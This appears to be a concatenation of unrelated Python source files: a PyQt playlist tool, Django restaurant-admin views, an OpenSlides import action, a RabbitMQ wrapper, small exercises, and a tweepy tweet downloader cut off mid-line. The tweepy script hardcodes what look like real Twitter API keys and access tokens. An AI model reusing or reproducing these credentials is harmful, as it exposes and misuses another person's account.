self.openButton.clicked.connect(self.openPlaylist)\n self.openButton.setStyleSheet(\"QPushButton { font: bold 16px; height: 50px; }\")\n\n self.exportButton = QPushButton('Save playlist', self)\n self.exportButton.setToolTip('Export playlist to file')\n 
self.exportButton.clicked.connect(self.exportPlaylist)\n self.exportButton.setStyleSheet(\"QPushButton { font: bold 16px; height: 50px; }\")\n\n self.bassoButton = QPushButton('Upload to Basso', self)\n self.bassoButton.setToolTip('Fill playlist to dj.Basso.fi')\n self.bassoButton.clicked.connect(self.fillBasso)\n self.bassoButton.setStyleSheet(\"QPushButton { font: bold 16px; height: 50px; }\")\n\n # line edits\n self.playlistNameLabel = QLabel(\"Playlist Name\")\n self.playlistDateLabel = QLabel(\"Playlist Date\")\n self.playlistFileLabel = QLabel(\"Playlist File\")\n self.playlistNameEdit = QLineEdit()\n self.playlistDateEdit = QLineEdit()\n self.playlistFileEdit = QLineEdit()\n self.playlistFileEdit.setReadOnly(True)\n\n # list view\n self.list = QTreeWidget()\n self.list.setFont(QFont('Consolas', 9))\n self.list.setStyleSheet(\"QTreeView::item { margin: 2px; }\") # QTreeWidget { border-radius: 2px; border-style: outset; border-width: 2px; }\n self.list.setAlternatingRowColors(True)\n self.list.setAcceptDrops(True)\n self.list.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)\n self.list.setDragDropMode(QAbstractItemView.InternalMove)\n self.list.setDropIndicatorShown(True)\n self.list.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.list.setSelectionMode(QAbstractItemView.SingleSelection)\n self.list.setColumnCount(4)\n self.list.setHeaderLabels((\"index\", \"artist\", \"song\", \"playtime\"))\n self.list.header().setStretchLastSection(False)\n self.list.header().setSectionResizeMode(2, QHeaderView.Stretch)\n self.list.setColumnWidth(0, 50)\n self.list.setColumnWidth(1, 500)\n self.list.setColumnWidth(3, 100)\n\n # grid\n self.mainGrid = QGridLayout()\n self.mainGrid.setSpacing(10)\n self.mainGrid.addWidget(self.openButton, 0, 0, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.exportButton, 0, 2, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.bassoButton, 0, 4, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.playlistFileLabel, 1, 0, 1, 1, Qt.AlignRight)\n self.mainGrid.addWidget(self.playlistFileEdit, 1, 1, 1, 5, Qt.AlignTop)\n self.mainGrid.addWidget(self.playlistNameLabel, 2, 0, 1, 1, Qt.AlignRight)\n self.mainGrid.addWidget(self.playlistNameEdit, 2, 1, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.playlistDateLabel, 2, 3, 1, 1, Qt.AlignRight)\n self.mainGrid.addWidget(self.playlistDateEdit, 2, 4, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.list, 3, 0, 1, 6)\n\n # main widget\n self.mainWidget = QWidget()\n self.mainWidget.setLayout(self.mainGrid)\n self.setCentralWidget(self.mainWidget)\n\n # ------------------------------------------------------------------------------\n\n def dragEnterEvent(self, event):\n if event.mimeData().hasUrls():\n event.accept()\n else:\n event.ignore()\n\n # ------------------------------------------------------------------------------\n \n def dragMoveEvent(self, event):\n if event.mimeData().hasUrls():\n event.setDropAction(Qt.CopyAction)\n event.accept()\n else:\n event.ignore()\n \n # ------------------------------------------------------------------------------\n \n def dropEvent(self, event):\n filename = str(event.mimeData().urls()[0].toLocalFile())\n self.addPlaylist(filename)\n\n # ------------------------------------------------------------------------------\n \n def openPlaylist(self, event):\n filename, _ = QFileDialog.getOpenFileName(self, 'Open playlist', self.defaultPath, \"Files (*.csv *.txt *.xlsx *.xlsm)\")\n if filename:\n self.addPlaylist(filename)\n \n # 
------------------------------------------------------------------------------\n \n def addPlaylist(self, filename):\n self.formatter.readPlaylist(filename)\n for index, row in enumerate(self.formatter.playlist):\n self.list.addTopLevelItem(QTreeWidgetItem((str(index + 1), row[\"artist\"], row[\"song\"], str(row[\"playtime\"]).split(\", \")[-1])))\n \n self.playlistFileEdit.setText(str(self.formatter.playlistFile))\n self.playlistNameEdit.setText(str(self.formatter.playlistName))\n self.playlistDateEdit.setText(str(self.formatter.playlistDate))\n self.statusbar.showMessage(\"Loaded playlist: {}\".format(filename), 5000)\n\n # ------------------------------------------------------------------------------\n \n def exportPlaylist(self, event):\n filename, _ = QFileDialog.getSaveFileName(self, 'Save playlist', self.defaultPath + os.sep + self.playlistNameEdit.text())\n if filename:\n if filename.endswith(\".csv\"):\n self.formatter.exportCSV(filename)\n\n elif filename.endswith(\".txt\"):\n printColor(\"txt export not implemented yet!\", colorama.Fore.RED)\n return\n\n elif filename.endswith(\".xlsx\"):\n printColor(\"Excel export not implemented yet!\", colorama.Fore.RED)\n return\n\n else:\n self.formatter.exportCSV(filename)\n\n self.statusbar.showMessage(\"Saved playlist as: {}\".format(filename), 5000) \n\n # ------------------------------------------------------------------------------\n \n def fillBasso(self, event):\n self.formatter.fillBasso(\"Ruff Cut\", self.playlistDateEdit.text())\n\n # ------------------------------------------------------------------------------\n \n def chooseFont(self, event):\n font, ok = QFontDialog.getFont()\n if ok:\n self.list.setFont(font)\n\n # ------------------------------------------------------------------------------\n \n def closeEvent(self, event):\n app.quit()\n\n # ------------------------------------------------------------------------------\n \n def aboutEvent(self, event):\n QMessageBox.about(self, \"About\", \"Playlist Tools\\nAkseli Lukkarila\\n2018\\n\\n\" + \n \"Python {:} QT {:} PyQT {:}\".format(sys.version.split(\" \")[0], \n QT_VERSION_STR, \n PYQT_VERSION_STR))\n\n\n# ==================================================================================\n\ndef printBold(text, color = colorama.Fore.WHITE):\n print(colorama.Style.BRIGHT + color + text + colorama.Style.RESET_ALL)\n\n# ==================================================================================\n\ndef printColor(text, color = colorama.Fore.WHITE):\n print(color + text + colorama.Style.RESET_ALL)\n\n# ==================================================================================\n\ndef getColor(text, color = colorama.Fore.WHITE):\n return color + text + colorama.Style.RESET_ALL\n\n# ==================================================================================\n\nif __name__ == \"__main__\":\n colorama.init()\n if len(sys.argv) > 1:\n # arguments given, run on command line\n printBold(\"\\n///// PLAYLIST FORMATTER /////\\n\", colorama.Fore.RED)\n filename = sys.argv[1]\n outfile = sys.argv[2] if len(sys.argv) == 2 else filename\n\n formatter = PlaylistFormatter()\n formatter.readPlaylist(filename)\n formatter.printPlaylist()\n\n print(\"exporting formatted playlist to:\")\n printColor(outfile, colorama.Fore.YELLOW)\n formatter.exportCSV(outfile)\n\n printBold(\"\\n/////////// DONE ////////////\\n\", colorama.Fore.GREEN)\n\n else: # open GUI\n app = QApplication(sys.argv)\n app.setStyle('Fusion')\n\n # colors\n palette = QPalette()\n 
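        # Fusion ignores native platform theming, so each palette role the UI
        # uses is assigned explicitly below before the palette is applied.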
palette.setColor(QPalette.Window, QColor(205,0,0))\n palette.setColor(QPalette.WindowText, Qt.white)\n palette.setColor(QPalette.Base, QColor(15,15,15))\n palette.setColor(QPalette.AlternateBase, QColor(53,53,53))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, Qt.white)\n palette.setColor(QPalette.Button, QColor(53,53,53))\n palette.setColor(QPalette.ButtonText, Qt.white)\n palette.setColor(QPalette.BrightText, Qt.red)\n palette.setColor(QPalette.Highlight, QColor(205,205,205).lighter())\n palette.setColor(QPalette.HighlightedText, Qt.black)\n app.setPalette(palette)\n\n # run tool\n tool = PlaylistTool()\n tool.show()\n\n # wait for exit\n sys.exit(app.exec_())\n","sub_path":"PlaylistFormatter.py","file_name":"PlaylistFormatter.py","file_ext":"py","file_size_in_byte":24320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577229974","text":"from django.shortcuts import render, redirect\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView, ModelFormMixin\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.views.generic import FormView,TemplateView\nfrom . import models\nfrom . import forms\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse , reverse_lazy\nfrom django.contrib import messages\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\n\n\n\n# Create your views here.\n@login_required\ndef change_password(request):\n if request.method == 'POST':\n form =PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n\n user = form.save()\n update_session_auth_hash(request, user) # Important!\n messages.success(request, 'Your password was successfully updated!')\n return redirect('restaurant_admin:login')\n else:\n messages.error(request, 'Please correct the error below.')\n else:\n form = PasswordChangeForm(request.user)\n print(form.error_messages)\n\n return render(request, 'restaurant_admin/change_password.html', {\n 'form': form\n })\n\ndef index(request):\n my_dict = {'insert_me': 'HELLO I AM FROM VIEWS.PY OF RESTAURANT_ADMIN !'}\n return render(request, 'restaurant_admin/index.html', context=my_dict)\n\n@login_required\ndef Home(request):\n return render(request,'restaurant_admin/home.html')\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryCreateView(CreateView):\n template_name = 'restaurant_admin/FoodCategorycreate.html'\n model = models.FoodCategory\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryUpdateView(UpdateView):\n template_name = 'restaurant_admin/FoodCategoryupdate.html'\n model = models.FoodCategory\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryDetailView(DetailView):\n template_name = 'restaurant_admin/FoodCategorydetail.html'\n model = models.FoodCategory\n fields = '__all__'\n\n'''\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryHomeDetailView(FormView, ListView):\n template_name = 'restaurant_admin/FoodCategoryHomedetail.html'\n form_class = forms.InputForm\n model = models.FoodCategory\n fields='__all__\n'''\n@method_decorator(login_required, 
name='dispatch')\nclass FoodCategoryHomeDetailView(View):\n template_name = 'restaurant_admin/FoodCategoryHomedetail.html'\n #form_class = forms.InputForm\n model = models.FoodCategory\n fields='__all__'\n chosen_object=None\n update_form=None\n queryset= models.FoodCategory.objects.all()\n\n def get(self,*args,**kwargs):\n self.queryset=self.model.objects.all()\n return render(self.request, 'restaurant_admin/FoodCategoryHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n def post(self,*args,**kwargs):\n postvalues = self.request.POST\n print(postvalues)\n if postvalues.get('foodcategory_id', None):\n id = self.request.POST.get('foodcategory_id')\n self.chosen_object= self.model.objects.get(pk=id)\n #print(self.chosen_object.name)\n\n if self.chosen_object != None:\n self.update_form=forms.FoodCategoryForm(instance=self.chosen_object)\n\n if postvalues.get('edit',None):\n self.chosen_object=self.model.objects.get(pk=postvalues['pk'])\n self.update_form=forms.FoodCategoryForm(self.request.POST,instance=self.chosen_object)\n if self.update_form.is_valid():\n foodcategory=self.update_form.save()\n print('yesk')\n foodcategory.save()\n self.queryset= models.FoodCategory.objects.all()\n self.chosen_object=self.model.objects.get(pk=foodcategory.pk)\n self.update_form=forms.FoodCategoryForm(instance=self.chosen_object)\n\n return render(self.request,'restaurant_admin/FoodCategoryHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n\n\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryDeleteView(DeleteView):\n template_name = 'restaurant_admin/FoodCategorydelete.html'\n model = models.FoodCategory\n fields = '__all__'\n\n def get(self, *args, **kwargs):\n return self.post(*args, **kwargs)\n\n def get_success_url(self):\n return reverse('restaurant_admin:FoodCategoryHome_detail')\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryListView(ListView):\n template_name = 'restaurant_admin/FoodCategorylist.html'\n model = models.FoodCategory\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCreateView(CreateView):\n\n model = models.Food\n fields = '__all__'\n template_name = 'restaurant_admin/Foodcreate.html'\n\n def form_valid(self, form):\n food_category = form.cleaned_data['food_category']\n food = form.save(commit=False)\n food.food_category= food_category\n food.save()\n return super(FoodCreateView, self).form_valid(form)\n\n@method_decorator(login_required, name='dispatch')\nclass FoodUpdateView(UpdateView):\n\n model = models.Food\n fields = '__all__'\n template_name = 'restaurant_admin/Foodupdate.html'\n\n def form_valid(self, form):\n food_category = form.cleaned_data['food_category']\n food = form.save(commit=False)\n food.food_category= food_category\n food.save()\n return super(FoodUpdateView, self).form_valid(form)\n\n@method_decorator(login_required, name='dispatch')\nclass FoodDetailView(DetailView):\n template_name = 'restaurant_admin/Fooddetail.html'\n model = models.Food\n fields = '__all__'\n'''\n@method_decorator(login_required, name='dispatch')\nclass FoodHomeDetailView(FormView, ListView):\n template_name = 'restaurant_admin/FoodHomedetail.html'\n form_class = forms.InputForm\n model = models.Food\n fields='__all__'\n'''\n\n\n@method_decorator(login_required, name='dispatch')\nclass FoodHomeDetailView(View):\n template_name = 
'restaurant_admin/FoodHomedetail.html'\n #form_class = forms.InputForm\n model = models.Food\n fields='__all__'\n chosen_object=None\n update_form=None\n queryset= models.Food.objects.all()\n\n def get(self,*args,**kwargs):\n self.queryset=self.model.objects.all()\n return render(self.request, 'restaurant_admin/FoodHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n def post(self,*args,**kwargs):\n postvalues = self.request.POST\n\n if postvalues.get('food_id', None):\n id = self.request.POST.get('food_id')\n self.chosen_object= self.model.objects.get(pk=id)\n #print(self.chosen_object.name)\n\n if self.chosen_object != None:\n self.update_form=forms.FoodForm(instance=self.chosen_object)\n\n if postvalues.get('edit',None):\n self.chosen_object=self.model.objects.get(pk=postvalues['pk'])\n self.update_form=forms.FoodForm(self.request.POST,instance=self.chosen_object)\n if self.update_form.is_valid():\n food=self.update_form.save()\n food.save()\n self.queryset= models.Food.objects.all()\n self.chosen_object=self.model.objects.get(pk=food.pk)\n self.update_form=forms.FoodForm(instance=self.chosen_object)\n\n return render(self.request,'restaurant_admin/FoodHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n\n@method_decorator(login_required, name='dispatch')\nclass FoodDeleteView(DeleteView):\n template_name = 'restaurant_admin/Fooddelete.html'\n model = models.Food\n fields = '__all__'\n\n def get(self, *args, **kwargs):\n return self.post(*args, **kwargs)\n\n def get_success_url(self):\n return reverse('restaurant_admin:FoodHome_detail')\n\n@method_decorator(login_required, name='dispatch')\nclass FoodListView(ListView):\n template_name = 'restaurant_admin/Foodlist.html'\n model = models.Food\n fields = '__all__'\n\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerCreateView(CreateView):\n template_name = 'restaurant_admin/Workercreate.html'\n model = models.Worker\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerUpdateView(UpdateView):\n template_name = 'restaurant_admin/Workerupdate.html'\n model = models.Worker\n fields = '__all__'\n\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerDetailView(DetailView):\n template_name = 'restaurant_admin/Workerdetail.html'\n model = models.Worker\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerHomeDetailView(View):\n template_name = 'restaurant_admin/WorkerHomedetail.html'\n #form_class = forms.InputForm\n model = models.Worker\n fields='__all__'\n chosen_object=None\n update_form=None\n queryset= models.Worker.objects.all()\n\n def get(self,*args,**kwargs):\n self.queryset=self.model.objects.all()\n return render(self.request, 'restaurant_admin/WorkerHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n def post(self,*args,**kwargs):\n postvalues = self.request.POST\n\n if postvalues.get('worker_id', None):\n id = self.request.POST.get('worker_id')\n self.chosen_object= self.model.objects.get(pk=id)\n #print(self.chosen_object.name)\n\n if self.chosen_object != None:\n self.update_form=forms.WorkerForm(instance=self.chosen_object)\n\n if postvalues.get('edit',None):\n self.chosen_object=self.model.objects.get(pk=postvalues['pk'])\n 
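            # rebind the posted values to the selected Worker so a valid form saves in place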
self.update_form=forms.WorkerForm(self.request.POST,instance=self.chosen_object)\n if self.update_form.is_valid():\n worker=self.update_form.save()\n worker.save()\n self.queryset= models.Worker.objects.all()\n self.chosen_object=self.model.objects.get(pk=worker.pk)\n self.update_form=forms.WorkerForm(instance=self.chosen_object)\n\n return render(self.request,'restaurant_admin/WorkerHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerDeleteView(DeleteView):\n #template_name = 'restaurant_admin/Workerdelete.html'\n model = models.Worker\n fields = '__all__'\n\n def get(self, *args, **kwargs):\n return self.post(*args, **kwargs)\n\n def get_success_url(self):\n return reverse('restaurant_admin:WorkerHome_detail')\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerListView(ListView):\n template_name = 'restaurant_admin/Workerlist.html'\n model = models.Worker\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass TableCreateView(CreateView):\n template_name = 'restaurant_admin/Tablecreate.html'\n model = models.Table\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass TableDetailView(DetailView):\n template_name = 'restaurant_admin/Tabledetail.html'\n model = models.Table\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass TableHomeDetailView(FormView, ListView):\n template_name = 'restaurant_admin/TableHomedetail.html'\n form_class = forms.InputForm\n model = models.Table\n fields='__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass TableDeleteView(DeleteView):\n #template_name = 'restaurant_admin/Tabledelete.html'\n model = models.Table\n fields = '__all__'\n\n def get(self, *args, **kwargs):\n return self.post(*args, **kwargs)\n\n def get_success_url(self):\n return reverse('restaurant_admin:TableHome_detail')\n\n\n@method_decorator(login_required, name='dispatch')\nclass TableListView(ListView):\n template_name = 'restaurant_admin/Tablelist.html'\n model = models.Table\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass CostCreateView(CreateView):\n template_name = 'restaurant_admin/Costcreate.html'\n model = models.Cost\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass CostUpdateView(UpdateView):\n template_name = 'restaurant_admin/Costupdate.html'\n model = models.Cost\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass CostDetailView(DetailView):\n template_name = 'restaurant_admin/Costdetail.html'\n model = models.Cost\n fields = '__all__'\n\n\n@method_decorator(login_required, name='dispatch')\nclass CostHomeDetailView(FormView, ListView):\n template_name = 'restaurant_admin/CostHomedetail.html'\n form_class = forms.InputForm\n model = models.Cost\n fields='__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass CostDeleteView(DeleteView):\n template_name = 'restaurant_admin/Costdelete.html'\n model = models.Cost\n fields = '__all__'\n\n def get_success_url(self):\n return reverse('restaurant_admin:CostHome_detail')\n\n@method_decorator(login_required, name='dispatch')\nclass CostListView(ListView):\n template_name = 'restaurant_admin/Costlist.html'\n model = models.Cost\n fields = 
'__all__'\n","sub_path":"restaurant_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"593499739","text":"from typing import Any, Dict, Iterable, Optional, Tuple\n\nfrom datastore.shared.util import DeletedModelsBehaviour\n\nfrom ....models.checker import Checker, CheckException\nfrom ....models.models import Organization\nfrom ....shared.exceptions import ActionException\nfrom ....shared.filters import FilterOperator\nfrom ....shared.interfaces.event import EventType\nfrom ....shared.interfaces.write_request import WriteRequest\nfrom ....shared.patterns import Collection, FullQualifiedId\nfrom ....shared.util import INITIAL_DATA_FILE, get_initial_data_file\nfrom ...action import Action\nfrom ...mixins.singular_action_mixin import SingularActionMixin\nfrom ...util.default_schema import DefaultSchema\nfrom ...util.register import register_action\nfrom ...util.typing import ActionData, ActionResults\n\n\n@register_action(\"organization.initial_import\", internal=True)\nclass OrganizationInitialImport(SingularActionMixin, Action):\n \"\"\"\n Action to import an initial-data.json in an empty datastore.\n Should be callable from the management service.\n \"\"\"\n\n model = Organization()\n schema = DefaultSchema(Organization()).get_default_schema(\n additional_required_fields={\"data\": {\"type\": \"object\"}},\n title=\"Import initial data.\",\n description=\"Import an initial data json in an empty datastore.\",\n )\n\n def perform(\n self, action_data: ActionData, user_id: int, internal: bool = False\n ) -> Tuple[Optional[WriteRequest], Optional[ActionResults]]:\n \"\"\"\n Simplified entrypoint to perform the action.\n \"\"\"\n self.user_id = user_id\n self.index = 0\n instance = next(iter(action_data))\n self.validate_instance(instance)\n instance = self.update_instance(instance)\n self.write_requests.extend(self.create_write_requests(instance))\n final_write_request = self.process_write_requests()\n return (final_write_request, [None])\n\n def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:\n data = instance[\"data\"]\n\n self.check_empty_datastore()\n\n if not data:\n data = get_initial_data_file(INITIAL_DATA_FILE)\n instance[\"data\"] = data\n\n # check datavalidation\n checker = Checker(data=data, mode=\"all\")\n try:\n checker.run_check()\n except CheckException as ce:\n raise ActionException(str(ce))\n\n return instance\n\n def check_empty_datastore(self) -> None:\n filter_ = FilterOperator(\"id\", \">=\", 1)\n if self.datastore.exists(\n Collection(\"organization\"),\n filter_,\n DeletedModelsBehaviour.ALL_MODELS,\n False,\n ):\n raise ActionException(\"Datastore is not empty.\")\n\n def create_write_requests(self, instance: Dict[str, Any]) -> Iterable[WriteRequest]:\n json_data = instance[\"data\"]\n write_requests = []\n for collection in json_data:\n for entry in json_data[collection].values():\n fqid = FullQualifiedId(Collection(collection), entry[\"id\"])\n write_requests.append(\n self.build_write_request(\n EventType.Create,\n fqid,\n \"initial import\",\n entry,\n )\n )\n return write_requests\n","sub_path":"openslides_backend/action/actions/organization/initial_import.py","file_name":"initial_import.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"63387928","text":"\"\"\"Module holding implementation of message 
brokers.\"\"\"\nimport logging\nimport os\nfrom abc import ABC, abstractmethod\n\nfrom collections.abc import Callable\nimport pika\n\n\nclass MessageBroker(ABC):\n \"\"\"Abstract implementation of a message broker.\"\"\"\n @abstractmethod\n def _setup(self):\n \"\"\"Abstract function which sets up the message broker.\"\"\"\n\n @abstractmethod\n def setup_callback(self, callback_function: Callable) -> None:\n \"\"\"Abstract function which sets up the callback.\"\"\"\n\n @abstractmethod\n def publish(self, body: bytes) -> None:\n \"\"\"Abstract function which publish a body to the message broker.\"\"\"\n\n @abstractmethod\n def start_consuming(self) -> None:\n \"\"\"Abstract function which starts the consumption of messages queued.\"\"\"\n\n\nclass RabbitMQ(MessageBroker):\n \"\"\"Implementation of a message broker using RabbitMQ\"\"\"\n def __init__(self, service: str='rabbitmq', publish_queue: str=None, consume_queue: str=None) -> None:\n self._host = os.environ.get(\"RABBITMQ_HOST\", \"localhost\")\n self._port = os.environ.get(\"RABBITMQ_PORT\", 5672)\n self._user = os.environ.get(\"RABBITMQ_USER\", \"guest\")\n self._pwd = os.environ.get(\"RABBITMQ_PWD\", \"guest\")\n self._publish_queue = publish_queue\n self._consume_queue = consume_queue\n self._logger = logging.getLogger(service)\n self._channel = self._setup()\n\n # pylint: disable=invalid-name\n def _setup(self) -> pika.channel.Channel:\n \"\"\"Sets up a channel to RabbitMQ Message Broker\"\"\"\n while True:\n try:\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(\n host=self._host,\n port=self._port,\n credentials=pika.PlainCredentials(\n self._user,\n self._pwd\n )\n )\n )\n channel = connection.channel()\n if self._publish_queue:\n channel.queue_declare(queue=self._publish_queue)\n if self._consume_queue:\n channel.queue_declare(queue=self._consume_queue)\n return channel\n except pika.exceptions.ProbableAuthenticationError as e:\n self._logger.error(\"Error while authenticating on RabbitMQ\")\n raise e\n except pika.exceptions.AuthenticationError as e:\n self._logger.error(\"Error while authenticating on RabbitMQ\")\n raise e\n except pika.exceptions.ConnectionClosedByBroker as e:\n self._logger.error(\"Connection was closed unexpectedly\")\n raise e\n except Exception as e: # pylint: disable=broad-except\n self._logger.error(\"Unexpected error on RabbitMQ: %s\", e)\n raise e\n\n def setup_callback(self, callback_function: Callable) -> None:\n self._channel.basic_consume(\n queue=self._consume_queue,\n on_message_callback=callback_function,\n auto_ack=False\n )\n\n def publish(self, body: bytes) -> None:\n self._channel.basic_publish(\n exchange='',\n routing_key=self._publish_queue,\n body=body\n )\n\n def start_consuming(self) -> None:\n self._channel.start_consuming()\n","sub_path":"common/common/message_broker.py","file_name":"message_broker.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"255999050","text":"def hej(imie):\n\t\n\tif imie == 'Ola':\n\t\tprint('Hej Alealeksandro!')\n\telif imie == 'Karo':\n\t\tprint('Hej Karcia!')\n\telse:\n\t\tprint('Hej'+' '+imie+ '!')\ndziewczyny = ['Rachel', 'Monica', 'Phoebe', 'Ola', 'Ty']\nfor imie in dziewczyny:\n\thej(imie)\n\tprint('Kolejna dziewczyna')\nfor i in range(1, 6):\n 
print(i)","sub_path":"własne_funkcje.py","file_name":"własne_funkcje.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"20350765","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 8 19:14:08 2020\r\n\r\n@author: z\r\n\"\"\"\r\n\r\n\r\ndef majorityElement(nums):\r\n \r\n \"\"\"\r\n calculates the element that occurs the most often\r\n in the list nums\r\n \"\"\"\r\n\r\n nums.sort()\r\n i = 0\r\n ans = [0,0]\r\n while i < len(nums):\r\n a = nums.count(nums[i])\r\n if a > ans[1]:\r\n ans[0] = nums[i]\r\n ans[1] = a\r\n i += a\r\n else:\r\n i += a\r\n return ans[0]","sub_path":"Duplicate numbers.py","file_name":"Duplicate numbers.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"46283575","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\nimport tweepy #https://github.com/tweepy/tweepy\r\nimport csv\r\nimport sqlite3\r\n\r\n#Twitter API credentials\r\nconsumer_key = \"FFjHNuDcapXxwlTvE1kCAsZMw\"\r\nconsumer_secret = \"SYSXcHtWDNkqsbWLHf6UV51QFGsPK245CqgThZ310tp00UwPvt\"\r\naccess_key = \"3084274719-eMn9OZzBHQoxh2c0hJKiNxo7EfZcgsdNfVOTcC8\"\r\naccess_secret = \"c7nUCfyNlTSI2WqlwcUQnNp4Bkwfz5IhTHRTvAI5nK6a9\"\r\n\r\ndef to_db(screen_name):\r\n\tf=open('%s_tweets.csv' % screen_name,'r') \r\n\tnext(f, None) \r\n\treader = csv.reader(f)\r\n\r\n\tsql = sqlite3.connect('\\\\db.sqlite3\\fyp_project_tweets')\r\n\tcur = sql.cursor()\r\n\r\n\tcur.execute('''CREATE TABLE IF NOT EXISTS fyp_project_Tweets\r\n (date datetime, message char)''') \r\n\t\t\t \r\n\tfor row in reader:\r\n\t\tcur.execute(\"INSERT INTO fyp_project_Tweets VALUES (? ,? )\", row)\r\n\t\r\n\tf.close()\r\n\tsql.commit()\r\n\tsql.close()\r\n\r\n\r\ndef get_all_tweets(screen_name):\r\n\t#Twitter only allows access to a users most recent 3240 tweets\r\n\t\r\n\t#authorize twitter, initialize tweepy\r\n\tauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n\tauth.set_access_token(access_key, access_secret)\r\n\tapi = tweepy.API(auth)\r\n\t\r\n\t#initialize a list to hold all the tweepy Tweets\r\n\talltweets = []\t\r\n\t\r\n\t#make initial request for most recent tweets (200 is the maximum allowed count)\r\n\tnew_tweets = api.user_timeline(screen_name = screen_name, count=200, include_rts=False)\r\n\t#new_tweets = api.user_timeline(screen_name = screen_name,count=340, include_rts=False)\r\n\t\r\n\t#save most recent tweets\r\n\talltweets.extend(new_tweets)\r\n\t\r\n\t#save the id of the oldest tweet less one\r\n\toldest = alltweets[-1].id - 1\r\n\t\r\n\t#keep grabbing tweets until there are no tweets left to grab\r\n\twhile len(new_tweets) > 0:\r\n\t\tprint (\"getting tweets before %s\" % (oldest));\r\n\t\t\r\n\t\t#all subsiquent requests use the max_id param to prevent duplicates\r\n\t\tnew_tweets = api.user_timeline(screen_name = screen_name,count=200, max_id=oldest)\r\n\t\t#new_tweets = api.user_timeline(screen_name = screen_name,count=340,max_id=oldest,tweet_mode = 'extended')\r\n\t\t\r\n\t\t#save most recent tweets\r\n\t\talltweets.extend(new_tweets)\r\n\t\t\r\n\t\t#update the id of the oldest tweet less one\r\n\t\toldest = alltweets[-1].id - 1\r\n\t\t\r\n\t\tprint (\"%s tweets downloaded\" % (len(alltweets)));\r\n\t\r\n\t#transform the tweepy tweets into a 2D array that will populate the csv\t\r\n\t#outtweets = [[tweet.id_str, tweet.created_at, tweet.full_text.encode(\"utf-8\").replace('\\n', ' ').replace('\\r', '')] 
